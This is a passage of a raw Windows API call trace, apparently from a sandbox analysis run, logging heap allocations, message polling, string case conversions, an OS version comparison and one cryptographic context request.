returned 1 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.687] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.687] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0207.687] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0207.688] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0207.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0207.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0207.689] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.689] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.689] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.690] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.691] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.691] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.691] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0207.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.692] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.692] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.693] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.693] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.693] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.693] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.693] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.693] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24b2e00 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.694] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0207.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.695] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.695] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0207.695] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0207.695] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0207.695] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.695] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0207.696] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.696] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.696] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.696] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.696] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.696] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0207.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.697] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.697] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0207.697] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0207.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0207.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.697] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0207.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.709] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.710] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.710] RtlAllocateHeap 